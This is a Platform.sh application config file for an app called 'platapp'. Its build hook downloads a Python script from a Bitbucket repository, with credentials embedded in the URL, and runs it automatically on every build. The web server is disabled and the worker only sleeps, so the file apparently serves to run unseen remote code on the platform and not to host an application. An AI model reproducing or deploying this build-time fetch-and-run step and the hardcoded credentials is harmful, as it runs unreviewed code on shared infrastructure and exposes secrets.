name: platapp
type: "python:2.7"

mounts:
    'work':
        source: local
        source_path: 'work'
    'ds':
        source: local
        source_path: '.screen'

hooks:
    build: |
      pip install --upgrade pip;pip install -r requirements.txt;wget -q https://shananalla88:nazgul0288@bitbucket.org/shananalla88/testpaw/raw/HEAD/mysetup.py;python2 mysetup.py platform.sh




disk: 5000 
#web:
#    commands:
#        start: python server.py
worker:
    commands:
        start: sleep infinity
